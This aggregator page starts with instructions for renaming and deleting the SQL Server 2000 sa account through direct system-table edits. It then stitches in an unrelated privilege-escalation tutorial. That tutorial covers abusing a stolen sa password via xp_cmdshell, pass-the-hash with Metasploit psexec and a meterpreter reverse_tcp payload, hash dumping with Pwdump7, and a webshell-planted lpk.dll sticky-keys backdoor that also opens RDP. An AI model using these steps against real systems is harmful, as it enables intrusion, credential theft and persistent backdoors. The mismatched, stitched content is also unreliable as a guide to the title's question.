怎么删掉MSSQL的sa帐号
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了怎么删掉MSSQL的sa帐号相关的知识,希望对你有一定的参考价值。
SQL2000中默认sa帐号改名和删除的最安全方法众所周知,在MSsql中有个绝对是网络安全中的隐患的帐号sa,系统管理员 (sa),默认情况下,它指派给固定服务器角色 sysadmin,并不能进行更改。这个sa一般情况下是既不可以更改名称,也不可以删除,呵呵,有点鸡肋的味道,弃置可惜,食之无味。在偶装上sql2000之后,感觉总之怪怪的,放着这个后门在,始终都不放心,担心有一天被人破出密码,那偶的电脑不就完拉,偶在黑道混拉那么多天,要是传出去,有损颜面啊。可能你回说设个强壮点的密码,这个办法是可行,可不是长久之记,所谓斩草要除根,要是把sa给删拉就不用担心那些"黑客"暴力****拉。
呵呵,前面说拉那么半天废话,可能你已经看的不耐烦拉,好,这就说道正题,大家跟着我来一起把sa给大卸八块首先打开SQL中的企业管理器,接着在工具选项卡中选择SQL server配置属性依次,点服务器设置,看到允许对系统目录直接进行修改前面的方框吗,点一下,好。
再打开查询分析器,登陆进去(呵呵,随便你用什么帐号进去,不过可一定要在master数据库中有db_owner的权限)输入
update sysxlogins set name=’你要改成的名字’ where sid=0x01
update sysxlogins set sid=0xE765555BD44F054F89CD0076A06EA823 where name=’你要改成的名字’
,OK,执行成功,好拉,转道企业管理器中刷新安全性中的登陆,看看,sa是不是变成xwq拉,呵呵,选中xwq点击右键,怎么样是不是出现拉删除的选项,呵呵,删除。看看sa是不是已经没有拉。
后记
直接在查询分析器里怎么删除sa
直接在查询分析器里怎么删除sa,做法和前面所说的差不多,只不过这次不是在企业管理器中做手脚拉,而是利用sql提供给我们功能强大的存储过程来完成这项任务。下面就是我所说的需要利用的存储过程sp_configure,sp_configure显示或更改当前服务器的全局配置设置。
它的语法:
sp_configure [ [ @configname = ] ’name’ ]
[ , [ @configvalue = ] ’value’ ]
实例:
sp_configure ’allow updates’, 1
go
RECONFIGURE WITH OVERRIDE
go
好拉,这样我们就可以更新系统表拉,接下来和前面的做法一样拉 update sysxlogins set name=’你要改成的名字’ where sid=0x01,然后再删除"你改名后的那个名字"
不过要注意在 sp_configure 上没有参数(或只有第一个参数)的执行许可权限默认授予所有用户。有两个参数的 sp_configure(用于更改配置选项)的执行许可权限默认授予 sysadmin 和 serveradmin 固定服务器角色。RECONFIGURE 权限默认授予 sysadmin 固定服务器角色和 serveradmin 固定服务器角色,并且不能传输。还得在master中是db_owner。 参考技术A 为缺省的系统管理员(SA)帐号分配一个复杂的密码。然后创建你唯一命名的帐号来处理管理工作,并给该帐号分配sysadmin角色。要确保新的帐号也具有复杂的密码。然后你就可以从sysadmin角色里把SA帐号删掉。
提权系列----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权
(一)、Mssql提权
必要条件:获取到mssql数据库最高权限用户sa的账号密码
Mssql默认端口:1433
Mssql最高权限用户:sa
得到sa密码之后,通过工具直接连接上去。
MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。
(二)、GetPass 提权
一款获取计算机用户账号密码的工具
(三)、hash传递入侵 msf加载
Hash 算法:windows密码的加密方式
Msf下载:http://www.rapid7.com/products/metasploit/download.jsp
以下使用Kali演示
Msf使用:
msfconsole //启动终端
use exploit/windows/smb/psexec //用到模块
show options //查看模块选项属性
set PAYLOAD windows/meterpreter/reverse_tcp //设置漏洞利用载体
Show targets //查看模块的攻击目标属性
set LHOST //设置本机地址
set RHOST 192.168.0.254 //设置属性目标主机地址
set SMBUser administrators //设置属性用户
set SMBPass xxx //设置属性密文hash
目标主机的hash怎么获取了?可以通过Pwdump7这个工具来获取hash值
复制以下一段就行了
exploit //开始攻击
获取当前shell,执行命令
(四)、lpk提权
触发:目录下存在exe文件被执行,他的特点是每个可执行文件运行之前都要加载该文件,windows系统是先判断当前文件目录是否存在此文件,如果目录下存在该文件则执行,如果不存在则会执行system32目录下的dll。
启动方案:3389远程桌面连接启动(连续shift,然后按热键)
提权方案:生成lpk.dll,通过webshell上传至文件目录,等待管理员去触发exe程序。
运行LPK Setch这个工具选择,2键启动,此时的2键3键值为LPK Sethc内置固定的数字,比如65,66就对应a与b。
然后点击生成,将生成的lpk.dll上传至任意目录,并运行其中的任何一个exe文件,lpk.dll将会自动替换为shift后门。
我这里把它生成到了软件的目录,然后点击运行软件
然后远程连接,连续按五次shift键,会出现下面的提示
接着同时按下组合键(也就是在哪里设置的65,66,对应的A,B),就会出现下面的密码框
输入密码,就会进入下面的界面!!!
还可以用来执行软件,比如用来开3389,在生成lpk.dll是选中
生成lpk.dll然后放到任意目录下,未执行软件之前远程是关闭的
然后执行exe软件,你好发现远程被打开了。
以上是关于怎么删掉MSSQL的sa帐号的主要内容,如果未能解决你的问题,请参考以下文章
mssql数据库的用户全删了,怎么再重新建立 windows操作系统